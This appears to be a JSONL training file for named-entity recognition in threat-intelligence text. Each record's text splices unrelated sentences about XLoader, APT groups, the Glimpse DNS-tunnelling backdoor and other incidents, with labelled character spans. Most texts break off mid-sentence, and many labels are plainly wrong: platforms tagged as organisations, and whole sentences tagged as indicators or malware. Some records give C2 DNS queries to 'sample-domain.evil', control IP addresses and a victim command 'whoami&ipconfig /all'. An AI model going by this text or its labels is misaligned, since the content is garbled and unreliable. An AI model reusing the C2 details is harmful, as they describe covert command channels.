{"text": "] com ) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load . APT1 is a China-based cyber-espionage group , active since mid-2006 . In text mode, Glimpse manually builds a DNS query to be transmitted over a UDP socket . The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": [{"start": 53, "end": 56, "label": "System"}, {"start": 134, "end": 138, "label": "Organization"}, {"start": 156, "end": 177, "label": "Organization"}, {"start": 218, "end": 225, "label": "Malware"}, {"start": 279, "end": 289, "label": "System"}, {"start": 296, "end": 304, "label": "Malware"}, {"start": 373, "end": 382, "label": "System"}]}
{"text": "If the user installs the profile , the malicious website will open , revealing it to be an Apple phishing site , as seen in figure 2 . APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals . In ping mode, Glimpse uses a .NET . Figure 8 : Scilc.exe usage example", "spans": [{"start": 91, "end": 96, "label": "Organization"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 237, "end": 244, "label": "Malware"}, {"start": 250, "end": 256, "label": "Indicator"}, {"start": 270, "end": 279, "label": "System"}]}
{"text": "Technical analysis Most of this new attack \u2019 s routines are similar to those of the previous XLoader versions . Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE . The table below describes the operational mode, record types used, and the method used to send the . According to a recent V3.co.uk article , 95 percent of companies have already fallen victim to attacks from advanced malware and suffer from an average of 643 successful infections per week .", "spans": [{"start": 93, "end": 100, "label": "Malware"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 155, "end": 162, "label": "Organization"}, {"start": 176, "end": 181, "label": "Organization"}, {"start": 219, "end": 227, "label": "System"}, {"start": 353, "end": 361, "label": "Organization"}, {"start": 386, "end": 395, "label": "Organization"}, {"start": 448, "end": 455, "label": "Malware"}]}
{"text": "However , as mentioned earlier , an analysis of this new variant showed some changes in its code in line with its new deployment method . However , the malware shared several traits with the RIPTIDE and HIGHTIDE backdoor that we have attributed to APT12 . The first DNS query by Glimpse requests the mode to be used in future communications with the controller (i.e., ping mode or text ) . The Twitter handle used by Hack520 indicates also an \u201c est \u201d portion .", "spans": [{"start": 191, "end": 198, "label": "System"}, {"start": 203, "end": 220, "label": "System"}, {"start": 248, "end": 253, "label": "Organization"}, {"start": 266, "end": 269, "label": "Indicator"}, {"start": 279, "end": 286, "label": "Malware"}, {"start": 417, "end": 424, "label": "Organization"}]}
{"text": "We discuss these changes and its effect on Android and Apple devices . From October 2012 to May 2014 , FireEye observed APT12 utilizing RIPTIDE , that communicates via HTTP to a hard-coded command and control ( C2 ) server . Prior to making any query, a function called AdrGen is used to build a query . Although we can not verify that the service disruptions occurred directly as a result of KillNet operations , the data below illustrates claims that overlap temporally with verified service disruptions .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 55, "end": 60, "label": "System"}, {"start": 103, "end": 110, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 136, "end": 143, "label": "System"}, {"start": 168, "end": 172, "label": "System"}, {"start": 393, "end": 400, "label": "Organization"}]}
{"text": "Malicious APK Like its previous versions , XLoader 6.0 abuses social media user profiles to hide its real C & C addresses , but this time its threat actors chose the social media platform Twitter , which was never used in previous attacks . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . This function takes several parameters, most of which are represented in the subdomain label(s) of the query . In addition , Hack520 \u2019s tweets always show photos of the same animal , which is likely his pet pig .", "spans": [{"start": 43, "end": 54, "label": "Malware"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 272, "end": 277, "label": "Organization"}, {"start": 306, "end": 314, "label": "System"}, {"start": 323, "end": 337, "label": "System"}, {"start": 340, "end": 344, "label": "System"}, {"start": 370, "end": 383, "label": "Vulnerability"}, {"start": 511, "end": 598, "label": "Indicator"}]}
{"text": "The real C & C address is encoded in the Twitter names , and can only be revealed once decoded . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset . Below is a list of AdrGen . Mandiant used these signatures to search the XPdb for additional attacker payloads that were deleted by the threat actor or otherwise unable to be identified through other forms of analysis .", "spans": [{"start": 41, "end": 48, "label": "Organization"}, {"start": 97, "end": 104, "label": "Organization"}, {"start": 130, "end": 137, "label": "System"}, {"start": 141, "end": 149, "label": "System"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 364, "end": 381, "label": "Malware"}]}
{"text": "This adds an extra layer against detection . They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . As mentioned above, one of the parameters passed to the AdrGen function is the action . The attacks used a multistage infection chain initiated with malicious Microsoft Office documents , most commonly using Microsoft Excel and PowerPoint file formats .", "spans": [{"start": 98, "end": 135, "label": "Organization"}, {"start": 154, "end": 177, "label": "System"}, {"start": 186, "end": 196, "label": "System"}, {"start": 212, "end": 232, "label": "System"}, {"start": 384, "end": 420, "label": "System"}, {"start": 443, "end": 458, "label": "System"}, {"start": 463, "end": 486, "label": "System"}]}
{"text": "The code for this characteristic and the corresponding Twitter accounts can be seen in figures 3 and 4 respectively . A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity . Table 5: Glimpse action parameters values for the AdrGen function below contains the possible parameters, a brief description, and return values applicable to the action . Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 55, "end": 62, "label": "Organization"}, {"start": 132, "end": 150, "label": "Organization"}, {"start": 159, "end": 166, "label": "Organization"}, {"start": 214, "end": 220, "label": "Organization"}, {"start": 269, "end": 278, "label": "Organization"}, {"start": 324, "end": 331, "label": "Malware"}]}
{"text": "Version 6.0 also adds a command called \u201c getPhoneState \u201d , which collects unique identifiers of mobile devices such as IMSI , ICCID , Android ID , and device serial number . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . The query to set the receive mode expects an A resource record response from the . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": [{"start": 134, "end": 141, "label": "System"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 212, "end": 246, "label": "Organization"}, {"start": 335, "end": 344, "label": "Organization"}]}
{"text": "This addition is seen in Figure 5 . About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . The controller will respond with one of two responses: 99.250.250.199 will set the receive mode to . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": [{"start": 60, "end": 78, "label": "Organization"}, {"start": 121, "end": 126, "label": "Organization"}, {"start": 183, "end": 202, "label": "System"}, {"start": 207, "end": 243, "label": "System"}, {"start": 301, "end": 315, "label": "Indicator"}, {"start": 468, "end": 476, "label": "Organization"}, {"start": 479, "end": 484, "label": "Organization"}, {"start": 487, "end": 494, "label": "Organization"}]}
{"text": "Considering the other malicious behaviors of XLoader , this added operation could be very dangerous as threat actors can use it to perform targeted attacks . With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc . Any other IP address will set the receive mode to ping, although the server-side software suggests 199.250.250.99 will be . RDP and phishing are two of the most popular initial ransomware attack vectors , and cybercriminals approach in leveraging these techniques has not changed much over the years .", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 267, "end": 281, "label": "Organization"}, {"start": 284, "end": 298, "label": "Organization"}, {"start": 385, "end": 392, "label": "Organization"}, {"start": 395, "end": 401, "label": "Organization"}, {"start": 404, "end": 411, "label": "Organization"}, {"start": 414, "end": 420, "label": "Organization"}, {"start": 528, "end": 542, "label": "Indicator"}, {"start": 638, "end": 652, "label": "Organization"}]}
{"text": "Malicious iOS profile In the case of Apple devices , the downloaded malicious iOS profile gathers the following : Unique device identifier ( UDID ) International Mobile Equipment Identity ( IMEI ) Integrated Circuit Card ID ( ICCID ) Mobile equipment identifier ( MEID ) Version number Product number The profile installations differ depending on the iOS . Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc . When set in text receive mode, the malware uses the AdrGen function to create another query string with the r (receiver) flag and a W (wait) action . At Talos , we pride ourselves on the quality of the intelligence we publish .", "spans": [{"start": 10, "end": 13, "label": "System"}, {"start": 37, "end": 42, "label": "System"}, {"start": 78, "end": 81, "label": "System"}, {"start": 351, "end": 354, "label": "System"}, {"start": 357, "end": 371, "label": "Organization"}, {"start": 458, "end": 465, "label": "Organization"}, {"start": 468, "end": 474, "label": "Organization"}, {"start": 477, "end": 484, "label": "Organization"}, {"start": 487, "end": 493, "label": "Organization"}, {"start": 655, "end": 660, "label": "Organization"}]}
{"text": "For versions 11.0 and 11.4 , the installation is straightforward . The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits \u2014 and a retooling of what security researchers believe is a massive spying operation based in China . The expected TXT record response has the following structure: . For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": [{"start": 131, "end": 136, "label": "Organization"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 418, "end": 430, "label": "Organization"}, {"start": 435, "end": 447, "label": "Organization"}, {"start": 487, "end": 499, "label": "Malware"}]}
{"text": "If a user visits the profile host website and allows the installer to download , the iOS system will go directly to the \u201c Install Profile \u201d page ( which shows a verified safety certificate ) , and then request the users \u2019 passcode for the last step of installation . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries . In our sample traffic, the TXT resource record returned contained: . The constant integers are obfuscated using structures and loops to get the right offset .", "spans": [{"start": 85, "end": 88, "label": "System"}, {"start": 352, "end": 357, "label": "Organization"}, {"start": 432, "end": 441, "label": "Organization"}, {"start": 444, "end": 463, "label": "Organization"}, {"start": 466, "end": 471, "label": "Organization"}, {"start": 476, "end": 505, "label": "Organization"}, {"start": 577, "end": 666, "label": "Malware"}]}
{"text": "On later versions , specifically iOS 12.1.1 and iOS 12.2 , the process is different . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . This response tells the malware to set a variable for the file name to receivebox\\rcvd10100 and set the next query action to D in order to request the next chunk of . The site also claimed to include the names , addresses and phone numbers of top CEOs .", "spans": [{"start": 33, "end": 43, "label": "System"}, {"start": 48, "end": 56, "label": "System"}, {"start": 171, "end": 181, "label": "Organization"}, {"start": 276, "end": 285, "label": "Organization"}, {"start": 288, "end": 307, "label": "Organization"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 320, "end": 349, "label": "Organization"}, {"start": 423, "end": 443, "label": "Indicator"}, {"start": 519, "end": 603, "label": "Organization"}]}
{"text": "After the profile is downloaded , the iOS system will first ask users to review the profile in their settings if they want to install it . On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . The malware sends another TXT query with the receiver . The new year is almost upon us , and 2022 has been a game of ransomware hardball .", "spans": [{"start": 38, "end": 41, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}, {"start": 286, "end": 305, "label": "Organization"}]}
{"text": "Users can see a \u201c Profile Downloaded \u201d added in their settings ( this feature is in iOS 12.2 , but not on iOS 12.1.1 ) . On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . This query is depicted below: 39e9D60005eca60000BCC64T.sample-domain.evil In the case of our sample traffic, the server responded with the following TXT resource record data: . Although KillMilk claims the activity was by their own group , the previous operations of Universal Dark Service targeted the Russian government and were critical of its actions .", "spans": [{"start": 84, "end": 92, "label": "System"}, {"start": 106, "end": 116, "label": "System"}, {"start": 169, "end": 178, "label": "Organization"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 272, "end": 291, "label": "Organization"}, {"start": 324, "end": 367, "label": "Indicator"}, {"start": 480, "end": 488, "label": "Organization"}, {"start": 561, "end": 583, "label": "Organization"}, {"start": 593, "end": 615, "label": "Organization"}]}
{"text": "This gives users a chance to see details and better understand any changes made . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 . The controller provided the malware with base64-encoded data to be . Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": [{"start": 231, "end": 240, "label": "Organization"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 345, "end": 362, "label": "Organization"}, {"start": 398, "end": 406, "label": "Organization"}, {"start": 411, "end": 425, "label": "Organization"}]}
{"text": "After the review , the process is the same as above . APT16 actors sent spear phishing emails to two Taiwanese media organizations . The data will eventually be written to disk and the malware sets the next query action to D in order to request the next chunk of . \u201c It appears to be the email address Will used for his profiles , \u201d the IT director replied .", "spans": [{"start": 54, "end": 66, "label": "Organization"}, {"start": 111, "end": 130, "label": "Organization"}, {"start": 302, "end": 306, "label": "Organization"}, {"start": 337, "end": 348, "label": "Organization"}]}
{"text": "After the profile is installed , the user will then be redirected to another Apple phishing site . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . The decoded data shows a command to be executed whoami&ipconfig /all on the victim . SysUpdate is exclusively used by Budworm .", "spans": [{"start": 77, "end": 82, "label": "Organization"}, {"start": 121, "end": 126, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 172, "end": 182, "label": "Organization"}, {"start": 209, "end": 226, "label": "Organization"}, {"start": 454, "end": 463, "label": "Malware"}, {"start": 487, "end": 494, "label": "Organization"}]}
{"text": "The phishing site uses the gathered information as its GET parameter , allowing the attacker to access the stolen information . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor . The malware sends another TXT query with the receiver structure, as depicted . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": [{"start": 175, "end": 180, "label": "Organization"}, {"start": 221, "end": 238, "label": "Organization"}, {"start": 321, "end": 335, "label": "System"}, {"start": 417, "end": 426, "label": "Organization"}]}
{"text": "Ongoing activity While monitoring this particular threat , we found another XLoader variant posing as a pornography app aimed at South Korean users . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 . Note the request number parameter is now 0001: 39e965e000caD60001679C79T.sample-domain.evil . The ransomware is a 64bit executable written in Rust and it recognises the following commandline parameters", "spans": [{"start": 76, "end": 83, "label": "Malware"}, {"start": 228, "end": 247, "label": "Organization"}, {"start": 291, "end": 296, "label": "Organization"}, {"start": 346, "end": 390, "label": "Indicator"}, {"start": 397, "end": 407, "label": "Malware"}, {"start": 413, "end": 429, "label": "Malware"}, {"start": 441, "end": 445, "label": "System"}]}
{"text": "The \" porn kr sex '' APK connects to a malicious website that runs XLoader in the background . The suspected APT16 targeting of the Taiwanese government agency \u2013 in addition to the Taiwanese media organizations \u2013 further supports this possibility . The TXT record returned contained data: E0000>0 . Ransomware source code is a malicious program that contains the instructions and algorithms that define the ransomware \u2019s behavior .", "spans": [{"start": 67, "end": 74, "label": "Malware"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 142, "end": 159, "label": "Organization"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 299, "end": 321, "label": "Malware"}]}
{"text": "The website uses a different fixed twitter account ( https : //twitter.com/fdgoer343 ) . APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" . The controller issued the command to write the base64-decoded and modified data to the file name set earlier in the exchange . Talos eventually uncovered additional campaigns , including the two previously mentioned by Ukraine \u2019s Computer Emergency Response Team ( CERT - UA ) and FortiGuard Labs researchers .", "spans": [{"start": 35, "end": 42, "label": "Organization"}, {"start": 53, "end": 84, "label": "Indicator"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 144, "end": 163, "label": "System"}, {"start": 252, "end": 282, "label": "Organization"}, {"start": 442, "end": 447, "label": "Organization"}, {"start": 534, "end": 591, "label": "Organization"}, {"start": 596, "end": 623, "label": "Organization"}]}
{"text": "This attack , however , seems exclusive to Android users , as it does not have the code to attack iOS devices . APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations . After the file is written, the malware moves on to process operations . There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 98, "end": 101, "label": "System"}, {"start": 112, "end": 117, "label": "Organization"}, {"start": 134, "end": 143, "label": "Organization"}, {"start": 163, "end": 175, "label": "Organization"}, {"start": 181, "end": 201, "label": "Organization"}, {"start": 258, "end": 277, "label": "Organization"}, {"start": 284, "end": 300, "label": "Organization"}, {"start": 303, "end": 312, "label": "Organization"}, {"start": 315, "end": 347, "label": "Organization"}, {"start": 350, "end": 366, "label": "Organization"}, {"start": 373, "end": 401, "label": "Organization"}, {"start": 518, "end": 526, "label": "Organization"}, {"start": 563, "end": 585, "label": "Organization"}, {"start": 633, "end": 647, "label": "Organization"}]}
{"text": "Succeeding monitoring efforts revealed a newer variant that exploits the social media platforms Instagram and Tumblr instead of Twitter to hide its C & C address . FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines . Glimpse can be set to use ping mode in several ways while performing receive operations . An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash - a - Business[.]com , which Harrison dedicated to \u201c all those sorry ass corporate executives out there profiting from your hard work , organs , lives , ideas , intelligence , and wallets . \u201d", "spans": [{"start": 96, "end": 105, "label": "Organization"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 128, "end": 135, "label": "Organization"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 202, "end": 213, "label": "System"}, {"start": 365, "end": 372, "label": "Malware"}, {"start": 455, "end": 598, "label": "Malware"}]}
{"text": "We labeled this new variant XLoader version 7.0 , because of the different deployment method and its use of the native code to load the payload and hide in Instagram and Tumblr profiles . The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight . If a query with the M action returns an IP address that is not 99.250.250.199 , the malware will use ping mode . In mid - June 2023 , KillNet announced that the collective and actors claiming to be from the Russian ransomware group REvil were collaborating in a joint operation targeting Western financial systems .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 156, "end": 165, "label": "Organization"}, {"start": 170, "end": 176, "label": "Organization"}, {"start": 199, "end": 210, "label": "System"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 353, "end": 367, "label": "Indicator"}, {"start": 424, "end": 431, "label": "Organization"}, {"start": 497, "end": 521, "label": "Organization"}, {"start": 522, "end": 527, "label": "Organization"}, {"start": 578, "end": 603, "label": "Organization"}]}
{"text": "These more recent developments indicate that XLoader is still evolving . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . It is worth noting that the IP response observed to set ping mode was the reverse of the IP used to set text mode (i.e., 199.250.250.99 ) . The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 73, "end": 80, "label": "Organization"}, {"start": 120, "end": 146, "label": "Organization"}, {"start": 149, "end": 152, "label": "Organization"}, {"start": 236, "end": 246, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 278, "end": 297, "label": "Organization"}, {"start": 300, "end": 310, "label": "Organization"}, {"start": 313, "end": 327, "label": "Organization"}, {"start": 334, "end": 352, "label": "Organization"}, {"start": 476, "end": 490, "label": "Indicator"}, {"start": 517, "end": 542, "label": "Organization"}, {"start": 568, "end": 572, "label": "Organization"}, {"start": 601, "end": 608, "label": "Organization"}]}
{"text": "Adding connections to FakeSpy We have been seeing activity from XLoader since 2018 , and have since followed up our initial findings with a detailed research revealing a wealth of activity dating back to as early as January 2015 , which outlined a major discovery\u2014its connection to FakeSpy . The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system . Ping mode will also be set if exceptions occur more than three times during text . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": [{"start": 22, "end": 29, "label": "Malware"}, {"start": 64, "end": 71, "label": "Malware"}, {"start": 282, "end": 289, "label": "Malware"}, {"start": 296, "end": 301, "label": "Organization"}, {"start": 321, "end": 334, "label": "System"}]}
{"text": "The emergence of XLoader 6.0 does not only indicate that the threat actors behind it remain active ; it also holds fresh evidence of its connection to FakeSpy . The malware used by the Wekby group has ties to the HTTPBrowser malware family , and uses DNS requests as a command and control mechanism . In the latter case, the P action is passed as one of the parameters to AdrGen and the query is made for an A resource record using the [System.Net.Dns]::GetHostAddresses . The campaigns contain malicious web links and attachments that infect users machines with malware when opened .", "spans": [{"start": 17, "end": 28, "label": "Malware"}, {"start": 151, "end": 158, "label": "Malware"}, {"start": 185, "end": 196, "label": "Organization"}, {"start": 213, "end": 239, "label": "System"}, {"start": 477, "end": 486, "label": "Organization"}]}
{"text": "One such immediately apparent connection was the similar deployment technique used by both XLoader 6.0 and FakeSpy . These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) . If performing receive operations in ping mode, Glimpse makes a query with the 0 action to contact the controller for . Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": [{"start": 91, "end": 102, "label": "Malware"}, {"start": 107, "end": 114, "label": "Malware"}, {"start": 222, "end": 233, "label": "System"}, {"start": 247, "end": 260, "label": "System"}, {"start": 268, "end": 279, "label": "Organization"}, {"start": 404, "end": 411, "label": "Malware"}]}
{"text": "It had again cloned a different legitimate Japanese website to host its malicious app , similar to what FakeSpy had also done before . APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy . This query uses a receive structure similar to an M action; it is worth noting all of the receiver operation queries made in ping mode use the [System.Net.Dns]::GetHostAddresses . We assess \" pack\\scil\\s1.txt \" is likely a file containing SCIL commands the attackers executed in MicroSCADA .", "spans": [{"start": 104, "end": 111, "label": "Malware"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 166, "end": 186, "label": "Organization"}, {"start": 218, "end": 275, "label": "Organization"}, {"start": 507, "end": 606, "label": "Indicator"}]}
{"text": "Their similarity is made more apparent by looking at their naming method for downloadable files , domain structure of fake websites and other details of their deployment techniques , exemplified in figure 10 . APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy . In our sample, after the malware sent the 0 action, the controller responded with an A record containing 24.125.10.140 . Future cybercriminal campaigns on social network platforms may not be so gentle .", "spans": [{"start": 210, "end": 215, "label": "Organization"}, {"start": 241, "end": 261, "label": "Organization"}, {"start": 264, "end": 315, "label": "Organization"}, {"start": 337, "end": 354, "label": "Organization"}, {"start": 365, "end": 386, "label": "Organization"}, {"start": 387, "end": 405, "label": "Organization"}, {"start": 406, "end": 420, "label": "Organization"}, {"start": 567, "end": 580, "label": "Indicator"}, {"start": 590, "end": 613, "label": "Organization"}, {"start": 617, "end": 641, "label": "System"}]}
{"text": "XLoader 6.0 also mirrors the way FakeSpy hides its real C & C server . FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors . This response tells the malware to: Set the file name for the data that will follow to 10140, Set the part number to 0, Parse response data, Set a 1 action for the next . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 33, "end": 40, "label": "Malware"}, {"start": 71, "end": 81, "label": "Organization"}, {"start": 98, "end": 104, "label": "Organization"}, {"start": 108, "end": 114, "label": "Organization"}, {"start": 145, "end": 157, "label": "Organization"}, {"start": 270, "end": 279, "label": "Organization"}, {"start": 282, "end": 289, "label": "Organization"}, {"start": 292, "end": 298, "label": "Organization"}, {"start": 301, "end": 311, "label": "Organization"}, {"start": 316, "end": 329, "label": "Organization"}, {"start": 503, "end": 520, "label": "Organization"}, {"start": 569, "end": 579, "label": "System"}]}
{"text": "When before it had used several different social media platforms , it now uses the Twitter platform , something FakeSpy has done in its past attacks . APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment . Query: 00039e9650eca66C06T.sample-domain.evil , Response: 24.125.10.140 , File name: 10140, Query: 139e965e000ca6D2C80T.sample-domain.evil , Response: 110.101.116.0 , Query: 00339e965e1ca6EF4C07T.sample-domain.evil , Response: 32.117.115.3 , Query: 30069e 1965eca6FE8C13T.sample-domain.evil, Response: 101.114.32.6 , Query: 391 e960095eca63570BC62T.sample-domain.evil , Response: 1.2.3.0 . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": [{"start": 83, "end": 90, "label": "Organization"}, {"start": 112, "end": 119, "label": "Malware"}, {"start": 151, "end": 164, "label": "System"}, {"start": 226, "end": 235, "label": "System"}, {"start": 295, "end": 333, "label": "Indicator"}, {"start": 346, "end": 359, "label": "Indicator"}, {"start": 387, "end": 426, "label": "Indicator"}, {"start": 439, "end": 452, "label": "Indicator"}, {"start": 462, "end": 502, "label": "Indicator"}, {"start": 515, "end": 527, "label": "Indicator"}, {"start": 590, "end": 602, "label": "Indicator"}, {"start": 612, "end": 655, "label": "Indicator"}, {"start": 668, "end": 675, "label": "Indicator"}, {"start": 709, "end": 716, "label": "Organization"}]}
{"text": "Analysis of the malicious iOS profile also revealed further connections , as the profile can also be downloaded from a website that FakeSpy deployed early this year . However , three themes in APT28 's targeting clearly reflects areas of specific interest to an Eastern European government , most likely the Russian government . In this case, the content net user is written to . The core module has a lot of functionality that gives the attacker full control of the victim machine .", "spans": [{"start": 26, "end": 29, "label": "System"}, {"start": 132, "end": 139, "label": "Malware"}, {"start": 193, "end": 198, "label": "Organization"}, {"start": 279, "end": 289, "label": "Organization"}, {"start": 396, "end": 422, "label": "Malware"}, {"start": 438, "end": 446, "label": "Organization"}]}
{"text": "Conclusion and security recommendations The continued monitoring of XLoader showed how its operators continuously changed its features , such as its attack vector deployment infrastructure and deployment techniques . We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government . After writing the data to disk, receiver operations are complete and processor operations . Sandworm is a full - spectrum threat actor that has carried out espionage , influence and attack operations in support of Russia 's Main Intelligence Directorate ( GRU ) since at least 2009 .", "spans": [{"start": 68, "end": 75, "label": "Malware"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 448, "end": 456, "label": "Organization"}, {"start": 570, "end": 617, "label": "Organization"}]}
{"text": "This newest entry seems to indicate that these changes won \u2019 t be stopping soon . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics . After writing the data received from the controller, a function is called to process the received . The UK , on the other hand , emerged as the second - largest ransomware target , enduring close to 200 ransomware attacks .", "spans": [{"start": 229, "end": 242, "label": "Organization"}, {"start": 428, "end": 477, "label": "Indicator"}, {"start": 480, "end": 520, "label": "Indicator"}]}
{"text": "Being aware of this fact can help create defensive strategies , as well as prepare for upcoming attacks . Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials . The processor function builds a list of files from the files with content that match rcvd* in the receivebox . Vice Society \u2019s targeting of education is undoubtedly deliberate and has likely allowed the gang to develop domain - specific techniques and expertise .", "spans": [{"start": 144, "end": 160, "label": "Organization"}, {"start": 362, "end": 377, "label": "Organization"}, {"start": 391, "end": 400, "label": "Organization"}]}
{"text": "In addition , just as uncovering new characteristics is important , finding ones we \u2019 ve also seen in a different malware family like FakeSpy also provides valuable insight . APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor . Similar to PoisonFrog , the last digit of the received file name determines how the content of the file is . Imagine you got an email that looked like it was from a friend .", "spans": [{"start": 134, "end": 141, "label": "Malware"}, {"start": 175, "end": 180, "label": "Organization"}, {"start": 384, "end": 389, "label": "Organization"}, {"start": 414, "end": 424, "label": "Malware"}]}
{"text": "Links between XLoader and FakeSpy can give clues to the much broader inner workings of the threat actors behind them . We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions . In our sample traffic, after executing the commands sent via cmd.exe , Glimpse writes the output of the commands in the sendbox directory to the appropriate file names (e.g., 10100 or 10140) prepended with proc (e.g., ) . Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 26, "end": 33, "label": "Malware"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 267, "end": 274, "label": "Indicator"}, {"start": 277, "end": 284, "label": "Malware"}, {"start": 437, "end": 449, "label": "Malware"}]}
